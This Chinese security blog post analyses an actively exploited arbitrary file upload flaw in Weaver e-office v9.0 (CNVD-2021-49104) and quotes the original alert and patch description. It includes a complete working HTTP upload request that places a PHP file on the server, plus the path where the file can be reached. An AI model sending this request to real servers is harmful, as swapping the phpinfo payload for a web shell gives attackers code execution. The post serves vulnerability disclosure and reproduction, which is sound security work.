漏洞预警：某 E-Office v9 被捕获的任意文件上传漏洞分析

Grav1ty

原文链接：漏洞预警：某 E-Office v9 被捕获的任意文件上传漏洞分析

一：漏洞描述

看朋友圈的时候发现都转发了一条漏洞预警

https://mp.weixin.qq.com/s/P75K_0869h-nWHRMu06zgQ

二:  漏洞影响

泛微 e-office v9.0

三:  漏洞复现

根据漏洞预警的图片修复描述来看一下源代码

存在漏洞的源代码位置，主要是源于 uploadType 参数设为 eoffice_logo 时，对文件没有校验，导致任意文件上传


调用方法 uploadPicture



构造请求上传文件即可

1. 
   
2. POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
   
3. Host: 127.0.0.1:7899
   
4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
   
5. Accept-Encoding: gzip, deflate
   
6. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
   
7. Connection: close
   
8. Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6
   
9. Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348
   
10. Content-Length: 193
    
11. Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
    
12. 
    
13. --e64bdf16c554bbc109cecef6451c26a4
    
14. Content-Disposition: form-data; name="Filedata"; filename="test.php"
    
15. Content-Type: image/jpeg
    
16. 
    
17. <?php phpinfo();?>
    
18. 
    
19. --e64bdf16c554bbc109cecef6451c26a4--

复制代码

上传成功后访问 /images/logo/logo-eoffice.php

Grav1ty

附 漏洞预警原文：泛微e-office未公开高危漏洞在野被广泛利用，企业需立即自查！

近日, 微步在线捕获泛微 e-office 上传漏洞在野利用：



经微步工程师分析，该漏洞为未公开漏洞 CNVD-2021-49104，该漏洞是由于 e-office 未能正确处理上传模块中用户输入导致的，攻击者可以构造恶意的上传数据包，实现任意代码执行。如下为官方修复漏洞后的代码片段：

上图红色方框标注的即为补丁中新增的校验代码，可以看到对于上传文件后缀名进行了白名单校验，由于该漏洞利用门槛低危害较大，建议使用了相关系统的机构组织立即修复该漏洞。

此次受影响泛微 e-office 版本如下：

泛微e-office 版本	是否受影响
V9.0	是

并附原文代码图片：